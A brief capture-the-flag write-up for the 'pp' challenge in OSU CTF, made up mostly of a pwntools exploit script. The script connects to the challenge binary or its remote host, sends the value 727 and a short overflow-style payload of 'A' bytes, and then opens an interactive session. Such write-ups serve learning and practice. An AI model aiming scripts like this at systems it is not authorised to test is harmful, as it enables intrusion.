dplastico

OSU CTF

pp was an easy challenge: below you can find the exploit for it:

#!/usr/bin/python3
from pwn import *
gs = '''
continue
'''
elf = context.binary = ELF('./challenge')
context.terminal = ['tmux', 'splitw', '-hp', '70']

def start():
    if args.GDB:
        return gdb.debug('./challenge', gdbscript=gs)
    if args.REMOTE:
        return remote('chal.osugaming.lol', 7279)
    else:
        return process('./challenge')
r = start()
#========= exploit here ===================
pp = 727
payload = b"A"*0x10

r.sendlineafter(b"get?", str(pp).encode('ascii'))
r.sendlineafter(b"words?", payload)

#========= interactive ====================
r.interactive()